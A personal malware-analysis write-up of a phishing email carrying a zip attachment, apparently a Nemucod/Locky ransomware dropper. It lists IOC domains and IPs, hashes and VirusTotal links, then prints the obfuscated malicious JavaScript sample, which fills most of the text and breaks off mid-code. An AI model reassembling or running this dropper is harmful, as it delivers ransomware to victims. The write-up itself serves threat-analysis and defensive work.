Below is a write up of a malicious email that I received the other day that looks to be Nemucod/Locky combination based on the results from the upload of the PCAP form Virustotal. Unfortunately it looks like this one did not fire completely as I did not get the “all your files are encrypted” message, and from looking at the PCAP there was just one GET request and nothing more. Possibly because this was several days old and the callback domains/IP addresses had already been taken offline (just a theory since several DNS calls were made and no DNS record was found and the IP addresses never connected to anything). Artifacts and the PCAP for this write up can be found via my Github repo located here.
IOCs for this Malspam:
======================
cnn-generics.com – 72.34.58.219 (DNS and HTTP)
ubcrvvbaltewu.biz – No FQDN found (DNS)
drsvngpkjkvn.su – No FQDN found (DNS)
kkokqnmljtutsb.work – No FQDN found (DNS)
phrdnbwytey.info – No FQDN found (DNS)
hcrcnirpqqll.pl – No FQDN found (DNS)
vblfuntulunjprgcu.info – No FQDN found
212.109.219.31 (HTTP)
5.152.199.70 (HTTP)
193.9.28.13 (HTTP)
107.181.187.12 (HTTP)
Here is the actual email that was sent to me. I do not remember having this conversation needless to say.
Running this through the usual toolsets (Revelo and Malzilla did not yield me any results). So I decided to do this the old-fashioned way. Below are the details about the zip file attached to the email and the javascript that was in the zip archive.
File name: INVOICE_herbie.zip
File size: 6.33KB
MD5 hash: 98bb5f62891fa2fdfb378b831a778aee
Virustotal link: http://www.virustotal.com/en/file/be2f7100acf59b2f915c7f7b73992e601aa6bcd92597d621c9f8dddf7e2cb0a1/analysis/
Detection ratio: 6 / 57
First submission 2016-05-27 23:41:45 UTC
File name: changes-623-.js
File size: 29KB
MD5 hash: 0f4224286abf46f300ba0997a827beda
Virustotal link: http://www.virustotal.com/en/file/df0a025d2737ba5838c25dac3deaf980f44b18898b7aceef9e85b06fb07c0ccc/analysis/
Detection ratio: 11 / 57
First submission 2016-05-29 01:40:31 UTC
Malwr link for ‘changes-623-.js’ file: http://malwr.com/analysis/NTNhN2E5NTQ0ZDU3NDQxYjhlZjY2NTFlMTgwNmUwZmU/
Below is the code from the javascript file:
/*@cc_on
var aWF9rS = ';-}- -;-)-(-]-t-L-C-H-[-3-s-S- -;-)-2- -,-/-*- - -L- -*-/- -2-j-A-K-H-(-]-o-E-D- -+- -0-g-B- -+- -6-n-O-W-[-3-s-S- -;-)-)-5-p-R-T-(-/-*- - -L- -*-/- -a-G-K-(-]-7-y-H-N-X- -+- -)-4-d-N-W-M-(-1-u-T-Q-[-3-s-S- -;-)-(-]-8-s-C-Y-[-3-s-S- -;-6-x-N-N-U-=-]-1-h-D-Y- -+- -v-S-G-Z-[-3-s-S- -;-9-h-J-G-I-N-=-]-0-n-Y-H-L- -+- -)-)-(-}-;-7-m-V- -n-r-u-t-e-r-{-)-(-x-B-K- -n-o-i-t-c-n-u-f-(-[-3-s-S- -;-)-s-O- -+- -w-P-L- -+- -)-0-b-K-E-(-2-a-S- -+- -2-y-G-S-W-(-]-5-j-F-W-G-R- -+- -7-s-T-J-K- -+- -0-j-U-H-M-X-[-t-p-i-r-c-S-W-=-3-s-S- -r-a-v- -{- -)-5-p-R-T- -,-/-*- - -L- -*-/- -2-j-A-K-H-(-7-z-C-E- -n-o-i-t-c-n-u-f- -;-}- -;-1-q-Q- -n-r-u-t-e-r- -;-)-"-"-(-]-)-)-(-}-;-m-B-O-S-A- -n-r-u-t-e-r-{-)-(-q-G-W-Q- -n-o-i-t-c-n-u-f-(-[-v-W-L-R-=-1-q-Q- -}- -;-)-)-4-m-Q-L-U-(-]-z-N-P- -+- -3-g-M- -+- -e-A-L- -+- -9-h-J-N-W-[-g-n-i-r-t-S-(-h-s-u-p-.-v-W-L-R- -}-;-]-7-b-B-T-H-[-h-K-N-W-=-4-m-Q-L-U-{- -e-s-l-e- -}-;-7-b-B-T-H-=-4-m-Q-L-U-{- -)-8-2-1- -<- -7-b-B-T-H-(- -f-i- -;-]-e-S-T-G-T-[-5-p-R-T-=-7-b-B-T-H- -{- -)-+-+-e-S-T-G-T- -;-]-)-)-(-}-;-s-I-K- -n-r-u-t-e-r-{-)-(-d-B-O- -n-o-i-t-c-n-u-f-(- -+- -4-p-T-K- -+- -b-K-O-T-H-[-5-p-R-T- -<- -e-S-T-G-T- -;-0-=-e-S-T-G-T- -r-a-v-(- -r-o-f- -;-4-m-Q-L-U- -r-a-v- -;-7-b-B-T-H- -r-a-v- -;-"-"-=-1-q-Q- -r-a-v- -;-)-(-y-a-r-r-A- -w-e-n-=-v-W-L-R- -r-a-v- -;-0-A-0-0-x-0-=-]-F-F-x-0-[-h-K-N-W- -;-0-A-5-2-x-0-=-]-E-F-x-0-[-h-K-N-W- -;-2-B-0-0-x-0-=-]-D-F-x-0-[-h-K-N-W- -;-F-7-0-2-x-0-=-]-C-F-x-0-[-h-K-N-W- -;-A-1-2-2-x-0-=-]-B-F-x-0-[-h-K-N-W- -;-7-B-0-0-x-0-=-]-A-F-x-0-[-h-K-N-W- -;-9-1-2-2-x-0-=-]-9-F-x-0-[-h-K-N-W- -;-0-B-0-0-x-0-=-]-8-F-x-0-[-h-K-N-W- -;-8-4-2-2-x-0-=-]-7-F-x-0-[-h-K-N-W- -;-7-F-0-0-x-0-=-]-6-F-x-0-[-h-K-N-W- -;-1-2-3-2-x-0-=-]-5-F-x-0-[-h-K-N-W- -;-0-2-3-2-x-0-=-]-4-F-x-0-[-h-K-N-W- -;-4-6-2-2-x-0-=-]-3-F-x-0-[-h-K-N-W- -;-5-6-2-2-x-0-=-]-2-F-x-0-[-h-K-N-W- -;-1-B-0-0-x-0-=-]-1-F-x-0-[-h-K-N-W- -;-1-6-2-2-x-0-=-]-0-F-x-0-[-h-K-N-W- -;-9-2-2-2-x-0-=-]-F-E-x-0-[-h-K-N-W- -;-5-B-3-0-x-0-=-]-E-E-x-0-[-h-K-N-W- -;-6-C-3-0-x-0-=-]-D-E-x-0-[-h-K-N-W- -;-E-1-2-2-x-0-=-]-C-E-x-0-[-h-K-N-W- -;-4-B-3-0-x-0-=-]-B-E-x-0-[-h-K-N-W- -;-9-A-3-0-x-0-=-]-A-E-x-0-[-h-K-N-W- -;-8-9-3-0-x-0-=-]-9-E-x-0-[-h-K-N-W- -;-6-A-3-0-x-0-=-]-8-E-x-0-[-h-K-N-W- -;-4-C-3-0-x-0-=-]-7-E-x-0-[-h-K-N-W- -;-5-B-0-0-x-0-=-]-6-E-x-0-[-h-K-N-W- -;-3-C-3-0-x-0-=-]-5-E-x-0-[-h-K-N-W- -;-3-A-3-0-x-0-=-]-4-E-x-0-[-h-K-N-W- -;-0-C-3-0-x-0-=-]-3-E-x-0-[-h-K-N-W- -;-3-9-3-0-x-0-=-]-2-E-x-0-[-h-K-N-W- -;-F-D-0-0-x-0-=-]-1-E-x-0-[-h-K-N-W- -;-1-B-3-0-x-0-=-]-0-E-x-0-[-h-K-N-W- -;-0-8-5-2-x-0-=-]-F-D-x-0-[-h-K-N-W- -;-0-9-5-2-x-0-=-]-E-D-x-0-[-h-K-N-W- -;-C-8-5-2-x-0-=-]-D-D-x-0-[-h-K-N-W- -;-4-8-5-2-x-0-=-]-C-D-x-0-[-h-K-N-W- -;-8-8-5-2-x-0-=-]-B-D-x-0-[-h-K-N-W- -;-C-0-5-2-x-0-=-]-A-D-x-0-[-h-K-N-W- -;-8-1-5-2-x-0-=-]-9-D-x-0-[-h-K-N-W- -;-A-6-5-2-x-0-=-]-8-D-x-0-[-h-K-N-W- -;-B-6-5-2-x-0-=-]-7-D-x-0-[-h-K-N-W- -;-3-5-5-2-x-0-=-]-6-D-x-0-[-h-K-N-W- -;-2-5-5-2-x-0-=-]-5-D-x-0-[-h-K-N-W- -;-8-5-5-2-x-0-=-]-4-D-x-0-[-h-K-N-W- -;-9-5-5-2-x-0-=-]-3-D-x-0-[-h-K-N-W- -;-5-6-5-2-x-0-=-]-2-D-x-0-[-h-K-N-W- -;-4-6-5-2-x-0-=-]-1-D-x-0-[-h-K-N-W- -;-8-6-5-2-x-0-=-]-0-D-x-0-[-h-K-N-W- -;-7-6-5-2-x-0-=-]-F-C-x-0-[-h-K-N-W- -;-C-6-5-2-x-0-=-]-E-C-x-0-[-h-K-N-W- -;-0-5-5-2-x-0-=-]-D-C-x-0-[-h-K-N-W- -;-0-6-5-2-x-0-=-]-C-C-x-0-[-h-K-N-W- -;-6-6-5-2-x-0-=-]-B-C-x-0-[-h-K-N-W- -;-9-6-5-2-x-0-=-]-A-C-x-0-[-h-K-N-W- -;-4-5-5-2-x-0-=-]-9-C-x-0-[-h-K-N-W- -;-A-5-5-2-x-0-=-]-8-C-x-0-[-h-K-N-W- -;-F-5-5-2-x-0-=-]-7-C-x-0-[-h-K-N-W- -;-E-5-5-2-x-0-=-]-6-C-x-0-[-h-K-N-W- -;-C-3-5-2-x-0-=-]-5-C-x-0-[-h-K-N-W- -;-0-0-5-2-x-0-=-]-4-C-x-0-[-h-K-N-W- -;-C-1-5-2-x-0-=-]-3-C-x-0-[-h-K-N-W- -;-C-2-5-2-x-0-=-]-2-C-x-0-[-h-K-N-W- -;-4-3-5-2-x-0-=-]-1-C-x-0-[-h-K-N-W- -;-4-1-5-2-x-0-=-]-0-C-x-0-[-h-K-N-W- -;-0-1-5-2-x-0-=-]-F-B-x-0-[-h-K-N-W- -;-B-5-5-2-x-0-=-]-E-B-x-0-[-h-K-N-W- -;-C-5-5-2-x-0-=-]-D-B-x-0-[-h-K-N-W- -;-D-5-5-2-x-0-=-]-C-B-x-0-[-h-K-N-W- -;-7-5-5-2-x-0-=-]-B-B-x-0-[-h-K-N-W- -;-1-5-5-2-x-0-=-]-A-B-x-0-[-h-K-N-W- -;-3-6-5-2-x-0-=-]-9-B-x-0-[-h-K-N-W- -;-5-5-5-2-x-0-=-]-8-B-x-0-[-h-K-N-W- -;-6-5-5-2-x-0-=-]-7-B-x-0-[-h-K-N-W- -;-2-6-5-2-x-0-=-]-6-B-x-0-[-h-K-N-W- -;-1-6-5-2-x-0-=-]-5-B-x-0-[-h-K-N-W- -;-4-2-5-2-x-0-=-]-4-B-x-0-[-h-K-N-W- -;-2-0-5-2-x-0-=-]-3-B-x-0-[-h-K-N-W- -;-3-9-5-2-x-0-=-]-2-B-x-0-[-h-K-N-W- -;-2-9-5-2-x-0-=-]-1-B-x-0-[-h-K-N-W- -;-1-9-5-2-x-0-=-]-0-B-x-0-[-h-K-N-W- -;-B-B-0-0-x-0-=-]-F-A-x-0-[-h-K-N-W- -;-B-A-0-0-x-0-=-]-E-A-x-0-[-h-K-N-W- -;-1-A-0-0-x-0-=-]-D-A-x-0-[-h-K-N-W- -;-C-B-0-0-x-0-=-]-C-A-x-0-[-h-K-N-W- -;-D-B-0-0-x-0-=-]-B-A-x-0-[-h-K-N-W- -;-C-A-0-0-x-0-=-]-A-A-x-0-[-h-K-N-W- -;-0-1-3-2-x-0-=-]-9-A-x-0-[-h-K-N-W- -;-F-B-0-0-x-0-=-]-8-A-x-0-[-h-K-N-W- -;-A-B-0-0-x-0-=-]-7-A-x-0-[-h-K-N-W- -;-A-A-0-0-x-0-=-]-6-A-x-0-[-h-K-N-W- -;-1-D-0-0-x-0-=-]-5-A-x-0-[-h-K-N-W- -;-1-F-0-0-x-0-=-]-4-A-x-0-[-h-K-N-W- -;-A-F-0-0-x-0-=-]-3-A-x-0-[-h-K-N-W- -;-3-F-0-0-x-0-=-]-2-A-x-0-[-h-K-N-W- -;-D-E-0-0-x-0-=-]-1-A-x-0-[-h-K-N-W- -;-1-E-0-0-x-0-=-]-0-A-x-0-[-h-K-N-W- -;-2-9-1-0-x-0-=-]-F-9-x-0-[-h-K-N-W- -;-7-A-0-2-x-0-=-]-E-9-x-0-[-h-K-N-W- -;-5-A-0-0-x-0-=-]-D-9-x-0-[-h-K-N-W- -;-3-A-0-0-x-0-=-]-C-9-x-0-[-h-K-N-W- -;-2-A-0-0-x-0-=-]-B-9-x-0-[-h-K-N-W- -;-C-D-0-0-x-0-=-]-A-9-x-0-[-h-K-N-W- -;-6-D-0-0-x-0-=-]-9-9-x-0-[-h-K-N-W- -;-F-F-0-0-x-0-=-]-8-9-x-0-[-h-K-N-W- -;-9-F-0-0-x-0-=-]-7-9-x-0-[-h-K-N-W- -;-B-F-0-0-x-0-=-]-6-9-x-0-[-h-K-N-W- -;-2-F-0-0-x-0-=-]-5-9-x-0-[-h-K-N-W- -;-6-F-0-0-x-0-=-]-4-9-x-0-[-h-K-N-W- -;-4-F-0-0-x-0-=-]-3-9-x-0-[-h-K-N-W- -;-6-C-0-0-x-0-=-]-2-9-x-0-[-h-K-N-W- -;-6-E-0-0-x-0-=-]-1-9-x-0-[-h-K-N-W- -;-9-C-0-0-x-0-=-]-0-9-x-0-[-h-K-N-W- -;-5-C-0-0-x-0-=-]-F-8-x-0-[-h-K-N-W- -;-4-C-0-0-x-0-=-]-E-8-x-0-[-h-K-N-W- -;-C-E-0-0-x-0-=-]-D-8-x-0-[-h-K-N-W- -;-E-E-0-0-x-0-=-]-C-8-x-0-[-h-K-N-W- -;-F-E-0-0-x-0-=-]-B-8-x-0-[-h-K-N-W- -;-8-E-0-0-x-0-=-]-A-8-x-0-[-h-K-N-W- -;-B-E-0-0-x-0-=-]-9-8-x-0-[-h-K-N-W- -;-A-E-0-0-x-0-=-]-8-8-x-0-[-h-K-N-W- -;-7-E-0-0-x-0-=-]-7-8-x-0-[-h-K-N-W- -;-5-E-0-0-x-0-=-]-6-8-x-0-[-h-K-N-W- -;-0-E-0-0-x-0-=-]-5-8-x-0-[-h-K-N-W- -;-4-E-0-0-x-0-=-]-4-8-x-0-[-h-K-N-W- -;-2-E-0-0-x-0-=-]-3-8-x-0-[-h-K-N-W- -;-9-E-0-0-x-0-=-]-2-8-x-0-[-h-K-N-W- -;-C-F-0-0-x-0-=-]-1-8-x-0-[-h-K-N-W- -;-7-C-0-0-x-0-=-]-0-8-x-0-[-h-K-N-W- -;-)-(-y-a-r-r-A- -w-e-n-=-h-K-N-W- -r-a-v- -{- -)-5-p-R-T-(-/-*- - -L- -*-/- -a-G-K- -n-o-i-t-c-n-u-f- -;-}- -;-p-B- -n-r-u-t-e-r- -;-}- -;-)-7-b-B-T-H-(-]-4-l-M-W-F-[-p-B- -}-;-]-4-m-Q-L-U-[-e-U-Z-=-7-b-B-T-H- -r-a-v-{- -e-s-l-e- -}-;-4-m-Q-L-U-=-7-b-B-T-H- -r-a-v-{- -)-8-2-1- -<- -4-m-Q-L-U-(- -f-i- -;-)-e-S-T-G-T-(-]-i-U-U-V-Z- -+- -)-)-(-}-;-8-c-C-U- -n-r-u-t-e-r-{-)-(-4-o-I-H- -n-o-i-t-c-n-u-f-(- -+- -3-k-L-K-W-[-d-L-C-Z-=-4-m-Q-L-U- -r-a-v- -{- -)-+-+-e-S-T-G-T- -;-]-s-I-K- -+- -4-p-T-K- -+- -b-K-O-T-H-[-d-L-C-Z- -<- -e-S-T-G-T- -;-0- -*- -1-=-e-S-T-G-T- -r-a-v-(- -r-o-f- -;-)-(-y-a-r-r-A- -w-e-n-=-p-B- -r-a-v- -;-F-F-x-0-=-]-0-A-x-0-[-e-U-Z- -;-E-F-x-0-=-]-0-A-5-2-x-0-[-e-U-Z- -;-D-F-x-0-=-]-2-B-x-0-[-e-U-Z- -;-C-F-x-0-=-]-F-7-0-2-x-0-[-e-U-Z- -;-B-F-x-0-=-]-A-1-2-2-x-0-[-e-U-Z- -;-A-F-x-0-=-]-7-B-x-0-[-e-U-Z- -;-9-F-x-0-=-]-9-1-2-2-x-0-[-e-U-Z- -;-8-F-x-0-=-]-0-B-x-0-[-e-U-Z- -;-7-F-x-0-=-]-8-4-2-2-x-0-[-e-U-Z- -;-6-F-x-0-=-]-7-F-x-0-[-e-U-Z- -;-5-F-x-0-=-]-1-2-3-2-x-0-[-e-U-Z- -;-4-F-x-0-=-]-0-2-3-2-x-0-[-e-U-Z- -;-3-F-x-0-=-]-4-6-2-2-x-0-[-e-U-Z- -;-2-F-x-0-=-]-5-6-2-2-x-0-[-e-U-Z- -;-1-F-x-0-=-]-1-B-x-0-[-e-U-Z- -;-0-F-x-0-=-]-1-6-2-2-x-0-[-e-U-Z- -;-F-E-x-0-=-]-9-2-2-2-x-0-[-e-U-Z- -;-E-E-x-0-=-]-5-B-3-x-0-[-e-U-Z- -;-D-E-x-0-=-]-6-C-3-x-0-[-e-U-Z- -;-C-E-x-0-=-]-E-1-2-2-x-0-[-e-U-Z- -;-B-E-x-0-=-]-4-B-3-x-0-[-e-U-Z- -;-A-E-x-0-=-]-9-A-3-x-0-[-e-U-Z- -;-9-E-x-0-=-]-8-9-3-x-0-[-e-U-Z- -;-8-E-x-0-=-]-6-A-3-x-0-[-e-U-Z- -;-7-E-x-0-=-]-4-C-3-x-0-[-e-U-Z- -;-6-E-x-0-=-]-5-B-x-0-[-e-U-Z- -;-5-E-x-0-=-]-3-C-3-x-0-[-e-U-Z- -;-4-E-x-0-=-]-3-A-3-x-0-[-e-U-Z- -;-3-E-x-0-=-]-0-C-3-x-0-[-e-U-Z- -;-2-E-x-0-=-]-3-9-3-x-0-[-e-U-Z- -;-1-E-x-0-=-]-F-D-x-0-[-e-U-Z- -;-0-E-x-0-=-]-1-B-3-x-0-[-e-U-Z- -;-F-D-x-0-=-]-0-8-5-2-x-0-[-e-U-Z- -;-E-D-x-0-=-]-0-9-5-2-x-0-[-e-U-Z- -;-D-D-x-0-=-]-C-8-5-2-x-0-[-e-U-Z- -;-C-D-x-0-=-]-4-8-5-2-x-0-[-e-U-Z- -;-B-D-x-0-=-]-8-8-5-2-x-0-[-e-U-Z- -;-A-D-x-0-=-]-C-0-5-2-x-0-[-e-U-Z- -;-9-D-x-0-=-]-8-1-5-2-x-0-[-e-U-Z- -;-8-D-x-0-=-]-A-6-5-2-x-0-[-e-U-Z- -;-7-D-x-0-=-]-B-6-5-2-x-0-[-e-U-Z- -;-6-D-x-0-=-]-3-5-5-2-x-0-[-e-U-Z- -;-5-D-x-0-=-]-2-5-5-2-x-0-[-e-U-Z- -;-4-D-x-0-=-]-8-5-5-2-x-0-[-e-U-Z- -;-3-D-x-0-=-]-9-5-5-2-x-0-[-e-U-Z- -;-2-D-x-0-=-]-5-6-5-2-x-0-[-e-U-Z- -;-1-D-x-0-=-]-4-6-5-2-x-0-[-e-U-Z- -;-0-D-x-0-=-]-8-6-5-2-x-0-[-e-U-Z- -;-F-C-x-0-=-]-7-6-5-2-x-0-[-e-U-Z- -;-E-C-x-0-=-]-C-6-5-2-x-0-[-e-U-Z- -;-D-C-x-0-=-]-0-5-5-2-x-0-[-e-U-Z- -;-C-C-x-0-=-]-0-6-5-2-x-0-[-e-U-Z- -;-B-C-x-0-=-]-6-6-5-2-x-0-[-e-U-Z- -;-A-C-x-0-=-]-9-6-5-2-x-0-[-e-U-Z- -;-9-C-x-0-=-]-4-5-5-2-x-0-[-e-U-Z- -;-8-C-x-0-=-]-A-5-5-2-x-0-[-e-U-Z- -;-7-C-x-0-=-]-F-5-5-2-x-0-[-e-U-Z- -;-6-C-x-0-=-]-E-5-5-2-x-0-[-e-U-Z- -;-5-C-x-0-=-]-C-3-5-2-x-0-[-e-U-Z- -;-4-C-x-0-=-]-0-0-5-2-x-0-[-e-U-Z- -;-3-C-x-0-=-]-C-1-5-2-x-0-[-e-U-Z- -;-2-C-x-0-=-]-C-2-5-2-x-0-[-e-U-Z- -;-1-C-x-0-=-]-4-3-5-2-x-0-[-e-U-Z- -;-0-C-x-0-=-]-4-1-5-2-x-0-[-e-U-Z- -;-F-B-x-0-=-]-0-1-5-2-x-0-[-e-U-Z- -;-E-B-x-0-=-]-B-5-5-2-x-0-[-e-U-Z- -;-D-B-x-0-=-]-C-5-5-2-x-0-[-e-U-Z- -;-C-B-x-0-=-]-D-5-5-2-x-0-[-e-U-Z- -;-B-B-x-0-=-]-7-5-5-2-x-0-[-e-U-Z- -;-A-B-x-0-=-]-1-5-5-2-x-0-[-e-U-Z- -;-9-B-x-0-=-]-3-6-5-2-x-0-[-e-U-Z- -;-8-B-x-0-=-]-5-5-5-2-x-0-[-e-U-Z- -;-7-B-x-0-=-]-6-5-5-2-x-0-[-e-U-Z- -;-6-B-x-0-=-]-2-6-5-2-x-0-[-e-U-Z- -;-5-B-x-0-=-]-1-6-5-2-x-0-[-e-U-Z- -;-4-B-x-0-=-]-4-2-5-2-x-0-[-e-U-Z- -;-3-B-x-0-=-]-2-0-5-2-x-0-[-e-U-Z- -;-2-B-x-0-=-]-3-9-5-2-x-0-[-e-U-Z- -;-1-B-x-0-=-]-2-9-5-2-x-0-[-e-U-Z- -;-0-B-x-0-=-]-1-9-5-2-x-0-[-e-U-Z- -;-F-A-x-0-=-]-B-B-x-0-[-e-U-Z- -;-E-A-x-0-=-]-B-A-x-0-[-e-U-Z- -;-D-A-x-0-=-]-1-A-x-0-[-e-U-Z- -;-C-A-x-0-=-]-C-B-x-0-[-e-U-Z- -;-B-A-x-0-=-]-D-B-x-0-[-e-U-Z- -;-A-A-x-0-=-]-C-A-x-0-[-e-U-Z- -;-9-A-x-0-=-]-0-1-3-2-x-0-[-e-U-Z- -;-8-A-x-0-=-]-F-B-x-0-[-e-U-Z- -;-7-A-x-0-=-]-A-B-x-0-[-e-U-Z- -;-6-A-x-0-=-]-A-A-x-0-[-e-U-Z- -;-5-A-x-0-=-]-1-D-x-0-[-e-U-Z- -;-4-A-x-0-=-]-1-F-x-0-[-e-U-Z- -;-3-A-x-0-=-]-A-F-x-0-[-e-U-Z- -;-2-A-x-0-=-]-3-F-x-0-[-e-U-Z- -;-1-A-x-0-=-]-D-E-x-0-[-e-U-Z- -;-0-A-x-0-=-]-1-E-x-0-[-e-U-Z- -;-F-9-x-0-=-]-2-9-1-x-0-[-e-U-Z- -;-E-9-x-0-=-]-7-A-0-2-x-0-[-e-U-Z- -;-D-9-x-0-=-]-5-A-x-0-[-e-U-Z- -;-C-9-x-0-=-]-3-A-x-0-[-e-U-Z- -;-B-9-x-0-=-]-2-A-x-0-[-e-U-Z- -;-A-9-x-0-=-]-C-D-x-0-[-e-U-Z- -;-9-9-x-0-=-]-6-D-x-0-[-e-U-Z- -;-8-9-x-0-=-]-F-F-x-0-[-e-U-Z- -;-7-9-x-0-=-]-9-F-x-0-[-e-U-Z- -;-6-9-x-0-=-]-B-F-x-0-[-e-U-Z- -;-5-9-x-0-=-]-2-F-x-0-[-e-U-Z- -;-4-9-x-0-=-]-6-F-x-0-[-e-U-Z- -;-3-9-x-0-=-]-4-F-x-0-[-e-U-Z- -;-2-9-x-0-=-]-6-C-x-0-[-e-U-Z- -;-1-9-x-0-=-]-6-E-x-0-[-e-U-Z- -;-0-9-x-0-=-]-9-C-x-0-[-e-U-Z- -;-F-8-x-0-=-]-5-C-x-0-[-e-U-Z- -;-E-8-x-0-=-]-4-C-x-0-[-e-U-Z- -;-D-8-x-0-=-]-C-E-x-0-[-e-U-Z- -;-C-8-x-0-=-]-E-E-x-0-[-e-U-Z- -;-B-8-x-0-=-]-F-E-x-0-[-e-U-Z- -;-A-8-x-0-=-]-8-E-x-0-[-e-U-Z- -;-9-8-x-0-=-]-B-E-x-0-[-e-U-Z- -;-8-8-x-0-=-]-A-E-x-0-[-e-U-Z- -;-7-8-x-0-=-]-7-E-x-0-[-e-U-Z- -;-6-8-x-0-=-]-5-E-x-0-[-e-U-Z- -;-5-8-x-0-=-]-0-E-x-0-[-e-U-Z- -;-4-8-x-0-=-]-4-E-x-0-[-e-U-Z- -;-3-8-x-0-=-]-2-E-x-0-[-e-U-Z- -;-2-8-x-0-=-]-9-E-x-0-[-e-U-Z- -;-1-8-x-0-=-]-C-F-x-0-[-e-U-Z- -;-0-8-x-0-=-]-7-C-x-0-[-e-U-Z- -;-)-(-y-a-r-r-A- -w-e-n-=-e-U-Z- -r-a-v- -{- -)-d-L-C-Z-(-1-l-S- -n-o-i-t-c-n-u-f- -;-}- -;-)-3-r-A-Y-W-(-1-l-S- -n-r-u-t-e-r- -;-)-(-]-t-L-C-H-[-3-s-S- -;-]-0-d-F-A-A- -+- -1-x-H-J-[-3-s-S-=-3-r-A-Y-W- -r-a-v- -;-)-/-*- - -L- -*-/- -2-j-A-K-H-(-]-)-)-(-}-;-3-c-H-X- -n-r-u-t-e-r-{-)-(-1-n-S-J-T- -n-o-i-t-c-n-u-f-(- -+- -o-F-O-L- -+- -)-)-(-}-;-j-Q-F-A-X- -n-r-u-t-e-r-{-)-(-4-a-H-E- -n-o-i-t-c-n-u-f-(- -+- -h-X-Z-[-3-s-S- -;-)-(-]-8-s-C-Y-[-3-s-S- -;-6-x-N-N-U-=-]-1-h-D-Y- -+- -v-S-G-Z-[-3-s-S- -;-9-h-J-G-I-N-=-]-0-n-Y-H-L- -+- -7-m-V-[-3-s-S- -;-)-s-O- -+- -w-P-L- -+- -0-b-K-E- -+- -2-y-G-S-W-(-]-5-j-F-W-G-R- -+- -7-s-T-J-K- -+- -0-j-U-H-M-X-[-t-p-i-r-c-S-W-=-3-s-S- -r-a-v- -{- -)-/-*- - -L- -*-/- -2-j-A-K-H-(-m-H-S-F-J- -n-o-i-t-c-n-u-f- -;-}- -}-;-e-s-l-a-f- -n-r-u-t-e-r-{- -e-s-l-e- -}-;-e-u-r-t- -n-r-u-t-e-r-{- -)-a-5-x-0- -=-=-]-1- -*- -1-[-5-p-R-T- -&-&- -D-4-x-0- -=-=-]-0-[-5-p-R-T-(- -f-i- -{- -)-5-p-R-T-(-/-*- - -L- -*-/- -6-b-G-W-Q-T- -n-o-i-t-c-n-u-f- -;-}- -;-5-p-R-T- -n-r-u-t-e-r- -;-}- -;-6-5-2- -%- -)-a-C- -+- -h-Q-R-(-=-h-Q-R- -;-h-Q-R- -=-^- -]-e-S-T-G-T-[-5-p-R-T- -{- -)-+-+-e-S-T-G-T- -;-]-s-I-K- -+- -4-p-T-K- -+- -)-b-K-O-T-H-(-c-I-T-B-J-[-5-p-R-T- -<- -e-S-T-G-T- -;-0-=-e-S-T-G-T- -r-a-v-(- -r-o-f- -;-)-(-e-s-r-e-v-e-r-.-5-p-R-T-=-5-p-R-T- -;-/-*- - -L- -*-/- -6-o-V-Z-=-h-Q-R- -;-}-]-[- -n-r-u-t-e-r-{- -)-8-m-M-Z-L- -=-!- -a-C-X-S-P-(- -f-i- -;-}- -;-0-0-0-0-0-0-0-0-1-x-0- -%- -)-]-e-S-T-G-T-[-5-p-R-T- -+- -a-C-X-S-P-(-=-a-C-X-S-P- -{- -)-+-+-e-S-T-G-T- -;-]-)-s-I-K-(-s-L-I-H-H- -+- -4-p-T-K- -+- -b-K-O-T-H-[-5-p-R-T- -<- -e-S-T-G-T- -;-0-=-e-S-T-G-T- -r-a-v-(- -r-o-f- -;-d-W-R-O-=-a-C-X-S-P- -;-)-4- -,-4---]-s-I-K- -+- -4-p-T-K- -+- -b-K-O-T-H-[-p-B-(-]-)-)-(-}-;-k-L-O- -n-r-u-t-e-r-{-)-(-3-m-G-M-E-Z- -n-o-i-t-c-n-u-f-(- -+- -t-Q-T-[-5-p-R-T- -;-4-2- -<-<- -]-1---]-s-I-K- -+- -4-p-T-K- -+- -)-)-(-}-;-b-K-O-T-H- -n-r-u-t-e-r-{-)-(-l-X-H- -n-o-i-t-c-n-u-f-(-[-5-p-R-T-[-5-p-R-T- -|- -6-1- -<-<- -]-2---]-)-s-I-K-(-z-L-V-K-D- -+- -4-p-T-K- -+- -)-b-K-O-T-H-(-l-A-[-5-p-R-T-[-5-p-R-T- -|- -)-8-7-7-9- -+- -0-7-7-9---(- -<-<- -]-3---]-s-I-K- -+- -4-p-T-K- -+- -)-)-(-}-;-b-K-O-T-H- -n-r-u-t-e-r-{-)-(-5-n-K-I-E- -n-o-i-t-c-n-u-f-(-[-5-p-R-T-[-5-p-R-T- -|- -]-4---]-s-I-K- -+- -4-p-T-K- -+- -)-)-(-}-;-b-K-O-T-H- -n-r-u-t-e-r-{-)-(-1-j-G-F-E- -n-o-i-t-c-n-u-f-(-[-5-p-R-T-[-5-p-R-T-=-8-m-M-Z-L- -r-a-v- -;-a-C-X-S-P- -r-a-v- -{- -)-5-p-R-T-(-5-q-A-W-N- -n-o-i-t-c-n-u-f- -;-)-0-(-t-i-u-Q-.-t-p-i-r-c-S-W- -;-)-r-Y-I-N-(- -e-l-i-h-w- -}- -;-}-;-e-u-n-i-t-n-o-c- -;-)-5-6-1- -+- -5- -*- -7-6-1-(-]-4-x-O-N-[-t-p-i-r-c-S-W-{- -)-e-(- -h-c-t-a-c- -}- -;-k-a-e-r-b- -;-)-1-n-O- -+- -p-O- -+- -9-h-V-B-(-]-c-K-[-y-M-O-E- -;-}-;-k-a-e-r-b-{- -)-e-(- -h-c-t-a-c- -}- -;-)-p-B- -,-9-h-V-B-(-7-z-C-E- -{- -y-r-t- -}- -;-e-u-n-i-t-n-o-c- -;-1-=-r-Y-I-N- -{- -)-)-p-B-(-/-*- - -L- -*-/- -6-b-G-W-Q-T-!- -|-|- -4-2-0-1- -*- -)-3-1- -+- -2- -*- -1-8-(- ->- -]-s-I-K- -+- -4-p-T-K- -+- -)-)-(-}-;-b-K-O-T-H- -n-r-u-t-e-r-{-)-(-3-u-J-D-I-F- -n-o-i-t-c-n-u-f-(-[-p-B- -|-|- -4-2-0-1- -*- -)-0-8-9-1- --- -0-3-1-2-(- -<- -]-)-s-I-K-(-2-p-X-V- -+- -4-p-T-K- -+- -b-K-O-T-H-[-p-B-(- -f-i- -;-)-p-B-(-5-q-A-W-N-=-p-B- -;-)-u-A-V-(-m-H-S-F-J-=-p-B- -r-a-v- -;-)-(-]-t-L-C-H-[-k-C-X-A- -;-)-4-q-C-Y-B- -,-u-A-V-(-]-o-E-D- -+- -)-0-g-B-(-b-B-V-H-J- -+- -6-n-O-W-[-k-C-X-A- -;-0-=-]-)-2-z-J-Q-H-A-(-c-A- -+- -3-q-Q-[-k-C-X-A- 